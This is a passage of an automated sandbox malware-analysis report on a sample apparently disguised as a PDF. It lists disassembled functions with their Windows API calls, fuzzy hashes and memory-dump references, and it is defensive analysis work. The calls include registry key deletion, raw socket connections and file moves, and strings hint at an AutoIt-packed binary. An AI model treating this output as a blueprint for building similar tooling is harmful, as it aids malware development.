                                    • Opcode Fuzzy Hash: 97e5c8b61fdcf43155a4b3a0477ffb45d216882c4c6288bbc6c5cd288acbe55e
                                    • Instruction Fuzzy Hash: 4251D4B09447D63DFB3A42388C45BBABEE96F06200F0885C9E3D546CCAD7A9A894D751
                                    Function 0101589F Relevance: 10.6, APIs: 7, Instructions: 138timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _wcsncpy$LocalTime
                                    • String ID:
                                    • API String ID: 2945705084-0
                                    • Opcode ID: eabec40fcdabc49d6e8ec34a46db31c160f470ab92bf10ac937ed31562f37dbd
                                    • Instruction ID: 8807fe03622c406e032ae71d14f63407db626c6e6c68ee3005f81939b2e576e5
                                    • Opcode Fuzzy Hash: eabec40fcdabc49d6e8ec34a46db31c160f470ab92bf10ac937ed31562f37dbd
                                    • Instruction Fuzzy Hash: CC41B5A6C2061876CB50F7B48C869CF77A9AF05311F548467FA18E3211E638E314D7E6
                                    Function 010138AD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,010138D3,?), ref: 010148C7
                                      • Part of subcall function 010148AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,010138D3,?), ref: 010148E0
                                    • lstrcmpiW.KERNEL32(?,?), ref: 010138F3
                                    • _wcscmp.LIBCMT ref: 0101390F
                                    • MoveFileW.KERNEL32(?,?), ref: 01013927
                                    • _wcscat.LIBCMT ref: 0101396F
                                    • SHFileOperationW.SHELL32(?), ref: 010139DB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                    • String ID: \*.*
                                    • API String ID: 1377345388-1173974218
                                    • Opcode ID: 2cf23939d79bbc5f5c85b6dcd49df8ffdba28f88ea75235f02ae0637ba1e7858
                                    • Instruction ID: d1a1607b421436de4f2a8793789e95fa9f52d9ec9d823c423ad07ef913ebd00f
                                    • Opcode Fuzzy Hash: 2cf23939d79bbc5f5c85b6dcd49df8ffdba28f88ea75235f02ae0637ba1e7858
                                    • Instruction Fuzzy Hash: 1C4180B15083859AC791EF64C881AEFB7ECBF98350F04096EB4C9C7165EB39D248C752
                                    Function 01037500 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _memset.LIBCMT ref: 01037519
                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 010375C0
                                    • IsMenu.USER32(?), ref: 010375D8
                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 01037620
                                    • DrawMenuBar.USER32 ref: 01037633
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Item$DrawInfoInsert_memset
                                    • String ID: 0
                                    • API String ID: 3866635326-4108050209
                                    • Opcode ID: d1de4fa075c94facb2fce9fb3dae4066330de2575abe0066f121757f5a60c45c
                                    • Instruction ID: 34b72abe6aa5a8ed54ef012c4e4d76c451bf1acc62d3abb178118d6e7421eb0e
                                    • Opcode Fuzzy Hash: d1de4fa075c94facb2fce9fb3dae4066330de2575abe0066f121757f5a60c45c
                                    • Instruction Fuzzy Hash: 93414FB5A00209EFEB20DF58D894E9ABBF8FF48310F048159FA95A7291D735E950DF90
                                    Function 0103122D Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0103125C
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01031286
                                    • FreeLibrary.KERNEL32(00000000), ref: 0103133D
                                      • Part of subcall function 0103122D: RegCloseKey.ADVAPI32(?), ref: 010312A3
                                      • Part of subcall function 0103122D: FreeLibrary.KERNEL32(?), ref: 010312F5
                                      • Part of subcall function 0103122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 01031318
                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 010312E0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                                    • String ID:
                                    • API String ID: 395352322-0
                                    • Opcode ID: f60982002b80367b92c7f29dfde6206843703a43cd2bf2fbad72228e901b38c0
                                    • Instruction ID: d3d0c8c8337d9efbd28fb95cc9a24a0f590fb2f7b364314ed8a6f5ef2016bc51
                                    • Opcode Fuzzy Hash: f60982002b80367b92c7f29dfde6206843703a43cd2bf2fbad72228e901b38c0
                                    • Instruction Fuzzy Hash: A8315CB1D0110ABFEB15DB94D889EFFBBBCEF08300F0041A9F581E2140EB759A459BA1
                                    Function 0103653C Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0103655B
                                    • GetWindowLongW.USER32(00B95080,000000F0), ref: 0103658E
                                    • GetWindowLongW.USER32(00B95080,000000F0), ref: 010365C3
                                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 010365F5
                                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0103661F
                                    • GetWindowLongW.USER32(00000000,000000F0), ref: 01036630
                                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0103664A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: LongWindow$MessageSend
                                    • String ID:
                                    • API String ID: 2178440468-0
                                    • Opcode ID: a0468c7466f819c7409370ec7ccaf45967c8297adcb289aeb1644220d0098913
                                    • Instruction ID: 72147771cf66f421bd20fb1875766cdce8eaf0c1d30ed449ca9c9c1188a25ffe
                                    • Opcode Fuzzy Hash: a0468c7466f819c7409370ec7ccaf45967c8297adcb289aeb1644220d0098913
                                    • Instruction Fuzzy Hash: 83313B70A04111AFEB71CF68D884F553BE9FB8A750F1802A4F5819B2EACB77E944DB41
                                    Function 01026486 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 010280A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 010280CB
                                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 010264D9
                                    • WSAGetLastError.WSOCK32(00000000), ref: 010264E8
                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01026521
                                    • connect.WSOCK32(00000000,?,00000010), ref: 0102652A
                                    • WSAGetLastError.WSOCK32 ref: 01026534
                                    • closesocket.WSOCK32(00000000), ref: 0102655D
                                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 01026576
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                    • String ID:
                                    • API String ID: 910771015-0
                                    • Opcode ID: e84ef710e2cc1fe438ae538cf10d52b3115578834c9e874b390fee02660c1ca2
                                    • Instruction ID: bed3564ff9419b12798eef674d437f60897da027d780cb8e19642f669e63ee10
                                    • Opcode Fuzzy Hash: e84ef710e2cc1fe438ae538cf10d52b3115578834c9e874b390fee02660c1ca2
                                    • Instruction Fuzzy Hash: 5431B331600229AFDB10AF24CC84FBE7BEDEB45714F008069FE85D7281CB79A944CB62
                                    Function 0100E0B5 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0100E0FA
                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0100E120
                                    • SysAllocString.OLEAUT32(00000000), ref: 0100E123
                                    • SysAllocString.OLEAUT32 ref: 0100E144
                                    • SysFreeString.OLEAUT32 ref: 0100E14D
                                    • StringFromGUID2.OLE32(?,?,00000028), ref: 0100E167
                                    • SysAllocString.OLEAUT32(?), ref: 0100E175
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                    • String ID:
                                    • API String ID: 3761583154-0
                                    • Opcode ID: 8a7e213f66f1b2b2cfa31dd543fba8f060a53c9fe9fa9575caf259197ef86ec7
                                    • Instruction ID: 75578cacd50bac8b822aa61d9f127225c73444767a102bae64c4e6edc349df07
                                    • Opcode Fuzzy Hash: 8a7e213f66f1b2b2cfa31dd543fba8f060a53c9fe9fa9575caf259197ef86ec7
                                    • Instruction Fuzzy Hash: 1B21B331604109AFEB21AFACDC88CEB77EDEF09760F008565F994DB295DA75DC818B60
                                    Function 0100FB6E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: __wcsnicmp
                                    • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                    • API String ID: 1038674560-2734436370
                                    • Opcode ID: 53c361af212cc1b0cf960592680c5ba6ee394a4bee43c55fc9796018a6ad163b
                                    • Instruction ID: 343cf8ad208a95d61c9ae6db68821ba259b45a8a652dbafc319b365e15bdb0b6
                                    • Opcode Fuzzy Hash: 53c361af212cc1b0cf960592680c5ba6ee394a4bee43c55fc9796018a6ad163b
                                    • Instruction Fuzzy Hash: C3213D7220455367F332F6289D13EAB77D9EF55340F044026FAC586182E7959981F295
                                    Function 0103783C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00FB1D73
                                      • Part of subcall function 00FB1D35: GetStockObject.GDI32(00000011), ref: 00FB1D87
                                      • Part of subcall function 00FB1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00FB1D91
                                    • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 010378A1
                                    • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 010378AE
                                    • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 010378B9
                                    • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 010378C8
                                    • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 010378D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: MessageSend$CreateObjectStockWindow
                                    • String ID: Msctls_Progress32
                                    • API String ID: 1025951953-3636473452
                                    • Opcode ID: 9f35ac63ce8ab1fbac63fc148197c9f0d656af40c71321f95321fa2f08188bce
                                    • Instruction ID: f5a1e723fbdc0689d89143bd59f3f9574c4d8479f2ad57edd61a4fdaf6b17a3e
                                    • Opcode Fuzzy Hash: 9f35ac63ce8ab1fbac63fc148197c9f0d656af40c71321f95321fa2f08188bce
                                    • Instruction Fuzzy Hash: C211B2B255021ABFEF159F64CC85EEB7F6DEF48798F014115FA44A6090C7729C21DBA0
                                    Function 00FD41C9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,00FD4292,?), ref: 00FD41E3
                                    • GetProcAddress.KERNEL32(00000000), ref: 00FD41EA
                                    • EncodePointer.KERNEL32(00000000), ref: 00FD41F6
                                    • DecodePointer.KERNEL32(00000001,00FD4292,?), ref: 00FD4213
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoInitialize$combase.dll
                                    • API String ID: 3489934621-340411864
                                    • Opcode ID: 588c488e83dfa95a392b7f01def71688d1a9e6fd46469b69b9864ccafe8e39db
                                    • Instruction ID: 52b604f56955a375281b02732bbad20183c58f0f67130aa55e314745124f7fd7
                                    • Opcode Fuzzy Hash: 588c488e83dfa95a392b7f01def71688d1a9e6fd46469b69b9864ccafe8e39db
                                    • Instruction Fuzzy Hash: 09E0E5B4F90301ABEB307BB1FC49B043AA9A721702F108428B4D1E9188DBBA50559F01
                                    Function 00FD429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FD41B8), ref: 00FD42B8
                                    • GetProcAddress.KERNEL32(00000000), ref: 00FD42BF
                                    • EncodePointer.KERNEL32(00000000), ref: 00FD42CA
                                    • DecodePointer.KERNEL32(00FD41B8), ref: 00FD42E5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                    • String ID: RoUninitialize$combase.dll
                                    • API String ID: 3489934621-2819208100
                                    • Opcode ID: 9f0e53c493f5b55540bc7d46fa1d559537ddada4e65a777a03a9aee61648c990
                                    • Instruction ID: 2d322414d19e9b51311f2b3bfb9e2bd830a40c78698c34c07043786f0b9ea77b
                                    • Opcode Fuzzy Hash: 9f0e53c493f5b55540bc7d46fa1d559537ddada4e65a777a03a9aee61648c990
                                    • Instruction Fuzzy Hash: 23E092B8F81212EBEA20AB61F949B043AA9B724743F144029F4C1E6188CBBA55049B15
                                    Function 0101675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: _memmove$__itow__swprintf
                                    • String ID:
                                    • API String ID: 3253778849-0
                                    • Opcode ID: e327b8897fd19e936d1eee5e2f0421ae7c7c5f06ec1c6915e15c0605240b16d7
                                    • Instruction ID: f4e29c4cf0fe07996e3cf90594a57dfb22926f28d4ac95799fe223501485da86
                                    • Opcode Fuzzy Hash: e327b8897fd19e936d1eee5e2f0421ae7c7c5f06ec1c6915e15c0605240b16d7
                                    • Instruction Fuzzy Hash: 5B61003050424AABDF11FF64CC81EFE3BA9BF44308F048559F9995B296DBB9A901DB50
                                    Function 0103046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00FB7F41: _memmove.LIBCMT ref: 00FB7F82
                                      • Part of subcall function 010310A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,01030038,?,?), ref: 010310BC
                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01030548
                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 01030588
                                    • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 010305AB
                                    • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 010305D4
                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 01030617
                                    • RegCloseKey.ADVAPI32(00000000), ref: 01030624
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                    • String ID:
                                    • API String ID: 4046560759-0
                                    • Opcode ID: fa8a4efa04b729c792ff60695c8d584614f59f2ad68ea60b1a745c01de8f8b05
                                    • Instruction ID: 822d9479a2a6f3ffc2acc9293b1dde8be88904af8c960693e50ff490d502a419
                                    • Opcode Fuzzy Hash: fa8a4efa04b729c792ff60695c8d584614f59f2ad68ea60b1a745c01de8f8b05
                                    • Instruction Fuzzy Hash: B2515531608201AFDB10EB68CC85EAFBBE9FF89714F04495DF585872A1DB35E904DB52
                                    Function 01035A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetMenu.USER32(?), ref: 01035A82
                                    • GetMenuItemCount.USER32(00000000), ref: 01035AB9
                                    • GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 01035AE1
                                    • GetMenuItemID.USER32(?,?), ref: 01035B50
                                    • GetSubMenu.USER32(?,?), ref: 01035B5E
                                    • PostMessageW.USER32(?,00000111,?,00000000), ref: 01035BAF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Menu$Item$CountMessagePostString
                                    • String ID:
                                    • API String ID: 650687236-0
                                    • Opcode ID: 4c1bf22f12d814e3b28379e29c30999fca2c07be391f0dc632add34787718a69
                                    • Instruction ID: aef0f83c1d64675ab2212ec5c6eafa04d780644e31b0cbcdd9e3f5d1e957eef5
                                    • Opcode Fuzzy Hash: 4c1bf22f12d814e3b28379e29c30999fca2c07be391f0dc632add34787718a69
                                    • Instruction Fuzzy Hash: 0851AF31A00615AFCB15EF64CC45AAEB7F9EF88310F144099E981BB361CB79AE419F91
                                    Function 0100F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0100F3F7
                                    • VariantClear.OLEAUT32(00000013), ref: 0100F469
                                    • VariantClear.OLEAUT32(00000000), ref: 0100F4C4
                                    • _memmove.LIBCMT ref: 0100F4EE
                                    • VariantClear.OLEAUT32(?), ref: 0100F53B
                                    • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0100F569
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1673395016.0000000000FB1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FB0000, based on PE: true
                                    • Associated: 00000000.00000002.1673338117.0000000000FB0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.000000000103F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673501484.0000000001065000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673629261.000000000106F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1673676978.0000000001078000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_fb0000_docs_pdf.jbxd
                                    Similarity
                                    • API ID: Variant$Clear$ChangeInitType_memmove
                                    • String ID:
                                    • API String ID: 1101466143-0
                                    • Opcode ID: 44fcda3562897db761c334bff975390cade2462a5e80d8f4fff3d94dd1a587ef
                                    • Instruction ID: 011c45cb1595bb97c4c46179e797e70deea2dccb221e650b4a0164727cb75d26
                                    • Opcode Fuzzy Hash: 44fcda3562897db761c334bff975390cade2462a5e80d8f4fff3d94dd1a587ef
                                    • Instruction Fuzzy Hash: 4D516CB5A0020AAFDB20DF58D880AAAB7F8FF4C354F158159EE59DB341D735E911CBA0
                                    Function 010126F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                    Download Yara Rule
                                    APIs
